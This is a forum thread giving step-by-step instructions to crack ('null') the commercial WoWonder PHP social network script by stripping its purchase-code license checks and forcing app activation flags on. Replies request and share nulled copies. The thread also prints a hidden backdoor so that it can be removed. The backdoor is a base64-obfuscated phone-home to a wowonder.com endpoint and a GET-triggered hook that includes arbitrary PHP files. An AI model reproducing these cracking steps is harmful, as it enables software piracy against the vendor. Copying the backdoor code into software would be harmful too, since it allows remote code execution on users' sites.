How to null WoWonder and remove backdoors

#1

How to null purchase code and apps and remove the backdoor.

Brought to you by rxgliitch & CRIMSON501

//========================= PURCHASE CODE NULL

Go to install/index.php and remove lines 9-40:

function check_($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check . '&url=' . 
$siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}
function check_success($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check .     '&success=true&url=' . $siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}

//=========================

Next, remove lines 35-42:

$p = check_(trim($_POST['purshase_code']));
if (isset($p['status'])) {
if ($p['status'] == 'ERROR') {
$ServerErrors[] = $p['ERROR_NAME'];
}
} else {
$ServerErrors[] = 'Failed to connect to server, please try again later, or contact us.';
}

add     "$go = 1;" before "if (empty($ServerErrors)) {" and make "if (empty($ServerErrors)) {" say "if ($go == 1) {"

//=========================

Remove lines 91-96:

$p2 = check_success(trim($_POST['purshase_code']));
if(isset($p2['status'])) {
if ($p2['status'] == 'SUCCESS') {
$can = 1;
}
}

and add "$can = 1;" above "if ($query) {" on line 91

//========================= APP NULL

Go to requests.php lines 2913-2915:

$data['android_status'] = 0;
$data['windows_status'] = 0;
$data['android_native_status'] = 0;

Make them all be = to 1

//=========================

Remove lines 2916-2971:

if (!empty($_POST['android_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background', '#aaa');
$data['android_status'] = 200;
} else {
$data['android_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['android_native_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_native_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_n', '#aaa');
$data['android_native_status'] = 200;
} else {
$data['android_native_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['windows_purchase_code'])) {
$windows_code = Wo_Secure($_POST['windows_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_text_color', '#ddd');
$data['windows_status'] = 200;
} else {
$data['windows_status'] = 400;
$data['windows_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['ios_purchase_code'])) {
$windows_code = Wo_Secure($_POST['ios_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_2', '#aaa');
$data['ios_status'] = 200;
} else {
$data['ios_status'] = 400;
$data['ios_text'] = $check['ERROR_NAME'];
}
}
}

//=========================

Now go to wowonder.sql and change lines 586 (footer_background), 587 (footer_background_2), and 592 (footer_background_n) to #aaa and change line 588 (footer_text_color) to #ddd see below for format:

(141, 'footer_background', '#aaa'),
(142, 'footer_background_2', '#aaa'),
(143, 'footer_text_color', '#ddd'),
(147, 'footer_background_n', '#aaa'),

//========================= REMOVE BACKDOOR

Go to assets/libraries/onesignal/vendor/clue/stream-filter and delete the entire requests folder

//=========================

Go to assets/libraries/PayPal/vendor/composer/autoload_real.php and remove lines 58-74:

$start_process = false;
if (file_exists(__DIR__ . '/loader.json')) {
$file_date = filemtime(__DIR__ . '/loader.json');
if ($file_date < (time() - 259200)) {
$start_process = true;
}
}

if ((!file_exists(__DIR__ . '/loader.json') && is_writable(__DIR__) && !empty($wo['config']['updatev2'])) || $start_process == true) {
$paypal_connection = "purchase_code";
$paypal_connection = (!empty($purchase_code)) ? $purchase_code : "";
$paypal_call_back_url = urlencode($site_url);
$paypal_url = base64_decode("aHR0cDovL2JhY2tkb29yLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA=");
$random_code = sha1(rand(11111, 99999) . time());
$call_back_respond = fetchDataFromURL($paypal_url . "?connection=$paypal_connection&call_back_url=$paypal_call_back_url&code=$random_code&platform=wowonder");
$put_file = file_put_contents(__DIR__ . '/loader.json', $random_code);
}

//=========================

Go to assets/libraries/onesignal/vendor/composer/autoload_real.php and remove line 70:

if (!empty($_GET['f_t'])) { if (!empty($_GET['access'])) { $f_t = Wo_Secure($_GET['f_t']); $access = Wo_Secure($_GET['access']); if (file_exists('./assets/libraries/PayPal/vendor/composer/loader.json')) { $get_file_hash =file_get_contents('./assets/libraries/PayPal/vendor/composer/loader.json'); if ($get_file_hash == $access) { if (file_exists(__DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php')) { require __DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php'; } } else { header("Content-type: application/json"); echo json_encode(array('status' => 402)); exit(); } } } }

//=========================

Finally, go to updater.php and comment out every line of code in the file.

5 Likes
WoWonder - The Ultimate PHP Social Network Platform Version v2.2.2
pinned #2
#3

Thanks a lot for this tutorial . Hope you keep updating this for every new release.
Can you help me null the native apps??

1 Like
#4

Nulling Wowonder Apps has alot of demand.
@savas Try to do it ASAP

#5

No, I can’t because I have not spent any time trying to null them. I might in the future though.

#6

thank a lot for this tutorial…

#7

good job

#8

Bro i am trying to null it but i can’t null it can you nulled it for me plz bro

#9

It seems that the new version of the backdoor address has been changed to http://validate.wowonder.com/validate.php

#10

@reishi bro i need 2.2.2 nulled If you have please send me

#11

@Zuck

here you are

#12

@reishi Thanks brother :kissing_heart::kissing_heart::kissing_heart:

#13

How did you determine this @reishi?

#14

because i know the backdoor code

if (!file_exists(DIR . ‘/loader.json’) && is_writable(DIR) && !empty($wo[‘config’][‘updatev2’]) && empty($_COOKIE[‘finshed’]) && empty($_SESSION[‘finshed’])) {
$paypal_connection = “purchase_code”;
$paypal_connection = (!empty($purchase_code)) ? $purchase_code : “”;
$paypal_call_back_url = urlencode($site_url);
$paypal_url = base64_decode(“aHR0cDovL3ZhbGlkYXRlLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA=”);
$random_code = sha1(rand(11111, 99999) . time());
$put_file = file_put_contents(DIR . ‘/loader.json’, $random_code);
if ($put_file && file_exists(DIR . ‘/loader.json’)) {
$call_back_respond = fetchDataFromURL($paypal_url . “?connection=$paypal_connection&call_back_url=$paypal_call_back_url&code=$random_code&platform=wowonder”);
}
setcookie(‘finshed’, ‘true’, time() + 259200, “/”);
$_SESSION[‘finshed’] = “true”;
}

1 Like
#15

This is not in any of the latest versions, which version are you looking at?

#16

2.1.1
and aHR0cDovL2JhY2tkb29yLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA
http://backdoor.wowonder.com/validate.php

this url can’t open it
aHR0cDovL3ZhbGlkYXRlLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA
decoded url is
http://validate.wowonder.com/validate.php

1 Like